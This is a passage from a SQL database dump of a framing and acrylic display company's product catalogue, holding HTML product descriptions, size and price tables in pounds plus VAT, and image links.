</tr>\r\n </tbody>\r\n</table>\r\n<br />\r\n<font size=\"2\">Bespoke size options also available which <br />\r\nwill be quoted on request. Please contact <br />\r\n(01254) 681001 for more details.</font> ','Available <span class=\'pinksmalltitle\'> Colours</span>','Click <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTE1\"><font color=\"#ec008c\" size=\"3\"><strong>here</strong></font></a> to see our colour swatch options. Please note that these colours have only been given as a visual representation and actual colours may vary.','N','2011-11-05 16:08:04','2010-05-18 15:27:58',16),(17,'Layout2','1','Overlay','acrylics-overlay.php','Overlay','Overlay','Overlay','','PROD_17.jpg','','The <span class=\'pinksmalltitle\'> Overlay</span>','<font color=\"#ec008c\" size=\"2\"><span lang=\"EN-GB\">\r\n<p><strong>Beautifully Avant-Garde<br />\r\n<br />\r\n</strong></p>\r\n</span></font><span lang=\"EN-GB\"><font size=\"2\">With an innovative use of layered acrylics, the Overlay generates an embracing design with a perfect harmony of balance and proportions.</font></span>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<font size=\"1\">(All measurements are in inches)<br />\r\n<br />\r\n</font>All prices are +vat<br />\r\n<br />\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><strong><font color=\"#ec008c\">Image</font> Size</strong></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Price</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 30x20</td>\r\n <td valign=\"top\"><br />\r\n <strong><font color=\"#ec008c\">£ 228+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x24</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 228+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x15</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 192+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x20</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 192+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x16</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 192+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x10</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 168+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x16</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 168+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x16</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 168+vat</font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n<br />\r\n<font size=\"2\">Bespoke size options also available which <br />\r\nwill be quoted on request. Please contact <br />\r\n(01254) 681001 for more details.</font> ','Available <span class=\'pinksmalltitle\'> Colours</span>','Click <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTE1\"><font color=\"#ec008c\" size=\"3\"><strong>here</strong></font></a> to see our colour swatch options. Please note that these colours have only been given as a visual representation and actual colours may vary.','N','2011-11-05 16:08:45','2010-05-18 15:44:42',17),(18,'Layout2','1','Statement','acrylics-statement.php','Statement','Statement','Statement','','PROD_18.jpg','','The <span class=\'pinksmalltitle\'> Statement</span>','<p><font color=\"#ec008c\"><span style=\"line-height: 115%; font-size: 10pt\"><strong>Effortlessly Elegant</strong></span><span style=\"line-height: 115%; font-size: 10pt\"><strong> <br />\r\n</strong><br />\r\n</span></font><span style=\"line-height: 115%; font-size: 10pt\">Clean lines and striking proportions, the Statement is extremely chic and will definitely create the \'wow-factor\'.</span></p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<font size=\"1\">(All measurements are in inches)<br />\r\n<br />\r\n</font>All prices are +vat<br />\r\n<br />\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><strong><font color=\"#ec008c\">Overall</font> Size</strong></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Price</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">56x22</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 290+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">48x20</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 220+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">36x16</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 190+vat</font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n ','Available <span class=\'pinksmalltitle\'> Colours</span>','<p>This product is only available in black.</p>','N','2011-03-29 12:10:45','2010-05-19 08:05:49',18),(19,'Layout2','1','Style','acrylics-style.php','Style','Style','Style','','PROD_19.jpg','','The <span class=\'pinksmalltitle\'> Style</span>','<span lang=\"EN-GB\"><font color=\"#ec008c\" size=\"2\"><span lang=\"EN-GB\">\r\n<p><strong>Refined Grace and Defined Proportions<br />\r\n<br />\r\n</strong></p>\r\n</span></font><span lang=\"EN-GB\"><font size=\"2\">Our original and still most versatile design, this style is adaptable to any shape or combination forming a stunning piece of display art.</font></span></span>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<font size=\"1\">(All measurements are in inches)<br />\r\n<br />\r\n</font>All prices are +vat<br />\r\n<br />\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><strong><font color=\"#ec008c\">Image</font> Size</strong></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Price</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 36x20</td>\r\n <td valign=\"top\"><br />\r\n <strong><font color=\"#ec008c\">£ 220+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">36x16</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 190+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x20</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 190+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x24</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 190+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x20</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 160+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x16</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 160+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x16</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 140+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x16</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 140+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x12</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 120+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">12x12</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 90+vat</font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n<br />\r\n<font size=\"2\">Bespoke size options also available which <br />\r\nwill be quoted on request. Please contact <br />\r\n(01254) 681001 for more details.</font> ','Available <span class=\'pinksmalltitle\'> Colours</span>','Click <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTE1\"><font color=\"#ec008c\" size=\"3\"><strong>here</strong></font></a> to see our colour swatch options. Please note that these colours have only been given as a visual representation and actual colours may vary.','N','2011-11-05 16:09:32','2010-05-19 08:07:33',19),(20,'Layout2','1','Tier','acrylics-Tier.php','Tier','Tier','Tier','','PROD_20.jpg','','The <span class=\'pinksmalltitle\'> Tier</span>','<font color=\"#ec008c\" size=\"2\"><span lang=\"EN-GB\">\r\n<p><strong>A Cut Above the Rest<br />\r\n<br />\r\n</strong></p>\r\n</span></font><span lang=\"EN-GB\"><font size=\"2\">The Tier clearly demonstrates the possibilities with offset presentation. A raised image panel literally brings a new dimension to the possibilities of presentation art.</font></span>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><font size=\"1\">(All measurements are in inches)<br />\r\n</font><br />\r\nThe Tier has been designed to a set acrylic and image size combination.<br />\r\n<font size=\"2\"><br />\r\nThe Acrylic Size is: 28x29<br />\r\nMain Image Size is: 20x16<br />\r\nSecondary Panel is: 20x5<br />\r\n</font><font color=\"#ec008c\" size=\"2\"><strong><br />\r\nPrice £185+vat</strong></font></p>','Available <span class=\'pinksmalltitle\'> Colours</span>','Click <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTE1\"><font color=\"#ec008c\" size=\"3\"><strong>here</strong></font></a> to see our colour swatch options. Please note that these colours have only been given as a visual representation and actual colours may vary.','N','2010-06-10 09:21:00','2010-05-19 08:09:03',20),(21,'Layout2','1','Veneer','acrylics-veneer.php','Veneer','Veneer','Veneer','','PROD_21.jpg','','The <span class=\'pinksmalltitle\'> Veneer</span>','<font color=\"#ec008c\" size=\"2\"><span lang=\"EN-GB\">\r\n<p><strong>Cutting Edge Presentation<br />\r\n<br />\r\n</strong></p>\r\n</span></font><span lang=\"EN-GB\"><font size=\"2\">An advanced acrylic concept combining abstract notions of colour, composition and elevation.</font></span>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<font size=\"1\">(All measurements are in inches)<br />\r\n<br />\r\n</font>All prices are +vat<br />\r\n<br />\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><strong><font color=\"#ec008c\">Image</font> Size</strong></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Price</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">36x20</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 290+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x30</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 290+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x20</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 270+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x24</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 270+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x16</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 250+vat</font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n<br />\r\n<font size=\"2\">Bespoke size options also available which <br />\r\nwill be quoted on request. Please contact <br />\r\n(01254) 681001 for more details.</font> ','Available <span class=\'pinksmalltitle\'> Colours</span>','Click <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTE1\"><font color=\"#ec008c\" size=\"3\"><strong>here</strong></font></a> to see our colour swatch options. Please note that these colours have only been given as a visual representation and actual colours may vary.','N','2011-11-05 16:10:07','2010-05-19 08:13:59',21),(22,'Layout2','1','4-Post','acrylics-4-post.php','4-Post','4-Post','4-Post','','PROD_22.jpg','','The <span class=\'pinksmalltitle\'> 4-Post</span>','<font color=\"#ec008c\" size=\"2\"><span lang=\"EN-GB\">\r\n<p><strong>Raising the Bar<br />\r\n<br />\r\n</strong></p>\r\n</span></font><span lang=\"EN-GB\"><font size=\"2\">A multi-functional high gloss piece, the 4 post takes presentation to the next level, enhancing your images in a fresh, clean and contemporary way.</font></span>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<font size=\"1\">(All measurements are in inches)<br />\r\n<br />\r\n</font>All prices are +vat<br />\r\n<br />\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><strong><font color=\"#ec008c\">Image</font> Size</strong></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Price</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 30x20</td>\r\n <td valign=\"top\"><br />\r\n <strong><font color=\"#ec008c\">£ 165+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x24</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 165+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x20</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 155+vat</font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n<br />\r\n<font size=\"2\">Bespoke size options also available which <br />\r\nwill be quoted on request. Please contact <br />\r\n(01254) 681001 for more details.</font> ','Available <span class=\'pinksmalltitle\'> Colours</span>','<p>Due to the construction of this product the 4-Post is only available in a 100% trasnparent clear acrylic.</p>','N','2011-11-05 16:10:36','2010-05-19 08:15:34',22),(23,'Layout2','2','Black & White Signature','framing-b&w.php','Black & White Signature','Black & White Signature','Black & White Signature','','PROD_23.jpg','','The <span class=\'pinksmalltitle\'> Signature Range</span>','<font size=\"2\"><span lang=\"EN-GB\">\r\n<p><br />\r\nThe Black & White Signature Range - a simple but innovative concept for Black & White photography. <br />\r\nArtwork must be supplied, if design is required it will be quoted on request.<br />\r\n<br />\r\nThis frame is also available with a \'traditional\' glass and mount frontage presentation. For this it is an added<br />\r\n10% on top of the list price. </p>\r\n</span></font>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><font size=\"1\">(All measurements are in inches)</font><br />\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"173\" height=\"160\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><br />\r\n <font size=\"2\"><strong><font color=\"#ec008c\">Frame</font></strong> <font color=\"#000000\">Size</font></font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong><br />\r\n <font size=\"2\">Price</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">20x16 </font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 65+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">20x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 70+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">24x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 75+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">28x24</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 80+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">28x28</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 85+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">32x28</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 90+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">30x30</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 95+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">38x28 </font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 100+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">44x24</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 105+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">50x30</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 110+vat</strong></font></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n<br />\r\n<font size=\"2\">Bespoke size options also available which <br />\r\nwill be quoted on request. Please contact <br />\r\n(01254) 681001 for more details.</font></p>','Moulding <span class=\'pinksmalltitle\'> Style\'s</span>','<p> </p>\r\n<p align=\"left\"><img alt=\"\" width=\"166\" height=\"63\" src=\"http://www.paulgrahamltd.com/EditorImages/image/Option 1(1).jpg\" /></p>','Y','2011-11-05 16:17:10','2010-05-19 10:27:57',28),(24,'Layout2','2','Compact','framing-comapct.php','Compact','Compact','Compact','','PROD_24.jpg','','The <span class=\\\'pinksmalltitle\\\'> Compact</span>','<br />\r\nCombining a neat and attractive appearance with a budget price makes the compact the ideal low cost framing option.<br />\r\nThe Compact comes in three distinct colour options and is available to stand or hang.','Size\\\'s & <span class=\\\'pinksmalltitle\\\'> Prices</span>','<p><font size=\"1\">(All measurements are in inches)</font><br />\r\n<table cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"173\" height=\"80\">\r\n <tbody>\r\n <tr>\r\n <td valign=\"top\" style=\"width: 100px\"><br />\r\n <font size=\"2\"><strong><font color=\"#ec008c\">Frame</font></strong> <font color=\"#000000\">Size</font></font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong><br />\r\n <font size=\"2\">Price</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">7x5</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 10+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">10x8</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 15+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">12x10</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 20+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x12</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\" size=\"2\">£ 30+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x16</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\" size=\"2\">£ 40+vat</font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n<br />\r\n<font size=\"2\">Bespoke size options also available which <br />\r\nwill be quoted on request. Please contact <br />\r\n(01254) 681001 for more details.</font></p>','Moulding <span class=\\\'pinksmalltitle\\\'> Style\\\'s</span>','<br />\r\n<img width=\"171\" height=\"150\" alt=\"\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Compact_Mould.jpg\" />','Y','2014-02-16 07:30:13','2010-05-19 10:48:24',23),(25,'Layout2','2','Dimensions','framing-dimensions.php','Dimensions','Dimensions','Dimensions','','PROD_25.jpg','','The <span class=\'pinksmalltitle\'> Dimensions</span>','<span lang=\"EN-GB\">\r\n<p><br />\r\nA fusion of style and formation effortlessly takes this frame into a new dimension. With a heavy set presentation when positioned on the wall, Dimensions commands attention in a subtle and attractive way.</p>\r\n</span>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><font size=\"1\">(All measurements are in inches)</font><br />\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"173\" height=\"150\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><br />\r\n <font size=\"2\"><strong><font color=\"#ec008c\">Frame</font></strong> <font color=\"#000000\">Size</font></font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong><br />\r\n <font size=\"2\">Price</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">20x16 </font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 150+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">20x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 160+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">24x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 165+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">24x24</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 175+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">30x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 185+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">36x16</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 200+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">30x30</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 200+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">40x30</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 220+vat</strong></font></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n<br />\r\n<font size=\"2\">Bespoke size options also available which <br />\r\nwill be quoted on request. Please contact <br />\r\n(01254) 681001 for more details.</font></p>','Moulding <span class=\'pinksmalltitle\'> Style\'s</span>','<br />\r\n<img alt=\"\" width=\"172\" height=\"190\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/dmiensions_mould.jpg\" />','Y','2011-11-05 16:19:37','2010-05-19 10:49:50',96),(26,'Layout2','2','Edge','framing-edge.php','Edge','Edge','Edge','','PROD_26.jpg','','The <span class=\'pinksmalltitle\'> Edge</span>','<span lang=\"EN-GB\">\r\n<p><br />\r\nMany of today\'s homes require a modern, simple and minimalistic approach to interior styling. The Edge is the ideal solution. It\'s understated presence allows the Edge to contribute to any surroundings in a subtle but imposing manner.</p>\r\n</span>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><font size=\"1\">(All measurements are in inches)</font><br />\r\n<br />\r\n<table dir=\"ltr\" border=\"0\" cellspacing=\"0\" cellpadding=\"1\" width=\"170\">\r\n <tbody>\r\n <tr>\r\n <td height=\"14\" width=\"68%\"><font size=\"2\" face=\"Cambria\"><font size=\"2\" face=\"Cambria\">\r\n <p><font face=\"Arial\"><font color=\"#ec008c\"><strong>Image</strong> </font>Size</font></p>\r\n </font></font></td>\r\n <td height=\"14\" width=\"32%\"><font size=\"2\"><font color=\"#ec008c\" size=\"2\">\r\n <p><strong>Price</strong></p>\r\n </font></font></td>\r\n </tr>\r\n <tr>\r\n <td height=\"14\" width=\"68%\">\r\n <p><font size=\"1\">5x5, 7x5, 8x6</font></p>\r\n </td>\r\n <td height=\"14\" width=\"32%\">\r\n <p><strong><font color=\"#ec008c\">£18+Vat</font></strong></p>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td height=\"13\" width=\"68%\"><font size=\"2\"><font size=\"1\">\r\n <p>10x8, 10x10, 12x10</p>\r\n </font></font></td>\r\n <td height=\"13\" width=\"32%\"><font size=\"2\"><font size=\"2\">\r\n <p><strong><font color=\"#ec008c\">£25+Vat</font></strong></p>\r\n </font></font></td>\r\n </tr>\r\n <tr>\r\n <td height=\"14\" width=\"68%\"><font size=\"2\"><font size=\"1\">\r\n <p>14x11 15x12, 16x12</p>\r\n </font></font></td>\r\n <td height=\"14\" width=\"32%\"><font size=\"2\"><font size=\"2\">\r\n <p><strong><font color=\"#ec008c\">£35+Vat</font></strong></p>\r\n </font></font></td>\r\n </tr>\r\n <tr>\r\n <td height=\"13\" width=\"68%\"><font size=\"2\"><font size=\"1\">\r\n <p>16x16,18 x12 20x16</p>\r\n </font></font></td>\r\n <td height=\"13\" width=\"32%\"><font size=\"2\"><font size=\"2\">\r\n <p><strong><font color=\"#ec008c\">£45+Vat</font></strong></p>\r\n </font></font></td>\r\n </tr>\r\n <tr>\r\n <td height=\"14\" width=\"68%\"><font size=\"2\"><font size=\"1\">\r\n <p>24x16, 24x20,30x15</p>\r\n </font></font></td>\r\n <td height=\"14\" width=\"32%\"><font size=\"2\"><font size=\"2\">\r\n <p><strong><font color=\"#ec008c\">£59+Vat</font></strong></p>\r\n </font></font></td>\r\n </tr>\r\n <tr>\r\n <td height=\"14\" width=\"68%\"><font size=\"2\"><font size=\"1\">\r\n <p>24x24, 30x20,36x16</p>\r\n </font></font></td>\r\n <td height=\"14\" width=\"32%\"><font size=\"2\"><font size=\"2\">\r\n <p><strong><font color=\"#ec008c\">£68+Vat</font></strong></p>\r\n </font></font></td>\r\n </tr>\r\n <tr>\r\n <td height=\"13\" width=\"68%\"><font size=\"2\"><font size=\"2\">\r\n <p><font size=\"1\">30x24 36x24,30x30,</font> </p>\r\n </font></font></td>\r\n <td height=\"13\" width=\"32%\"><font size=\"2\"><font size=\"2\">\r\n <p><strong><font color=\"#ec008c\">£80+Vat</font></strong></p>\r\n </font></font></td>\r\n </tr>\r\n <tr>\r\n <td height=\"14\" width=\"68%\"><font size=\"2\"><font size=\"1\">\r\n <p>40x30,50x30</p>\r\n </font></font></td>\r\n <td height=\"14\" width=\"32%\"><font size=\"2\"><font size=\"2\">\r\n <p><strong><font color=\"#ec008c\">£90+Vat</font></strong></p>\r\n </font></font></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n<br />\r\n<font size=\"2\">Bespoke size options also available which <br />\r\nwill be quoted on request. Please contact <br />\r\n(01254) 681001 for more details.</font></p>','Moulding <span class=\'pinksmalltitle\'> Style\'s</span>','<br />\r\n<img alt=\"\" width=\"170\" height=\"159\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/EDGE_MOULD.jpg\" />','Y','2011-11-05 16:17:48','2010-05-19 10:50:58',30),(27,'Layout2','2','Elegance','framing-elegance.php','Elegance','Elegance','Elegance','','PROD_27.jpg','','The <span class=\'pinksmalltitle\'> Elegance</span>','<span lang=\"EN-GB\">\r\n<p><br />\r\nStylish mouldings, colour co-ordinated slips and a glass fronted presentation all combine to form a truly elegant and timeless presentation. This frame is a fantastic solution for anyone who requires a modern take on traditional presentations. The harmony and balance of the slip and the mount ideally complement the image and frame.</p>\r\n</span>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><font size=\"1\">(All measurements are in inches)</font><br />\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"173\" height=\"160\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><br />\r\n <font size=\"2\"><strong><font color=\"#ec008c\">Frame</font></strong> <font color=\"#000000\">Size</font></font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong><br />\r\n <font size=\"2\">Price</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">20x16 </font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 80+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">20x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 90+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">24x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 100+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">24x24</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 105+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">30x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 110+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">36x16</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 115+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">30x30</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 120+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">40x30</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 125+vat</strong></font></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n<br />\r\n<font size=\"2\">Bespoke size options also available which <br />\r\nwill be quoted on request. Please contact <br />\r\n(01254) 681001 for more details.</font></p>','Moulding <span class=\'pinksmalltitle\'> Style\'s</span>','<br />\r\n<img alt=\"\" width=\"174\" height=\"252\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Elegance_Mould.jpg\" />','Y','2011-11-05 16:18:36','2010-05-19 10:52:13',93),(28,'Layout2','2','Lacquer','framing-lacquer.php','Lacquer','Lacquer','Lacquer','','PROD_28.jpg','','The <span class=\'pinksmalltitle\'> Lacquer</span>','<span lang=\"EN-GB\">\r\n<p>A contemporary classic created by the amalgamation of a high gloss laquered frame beautifully inlaid with acrylic. We recommend an acrylic border of between three to four inches, depending on overall frame size. <br 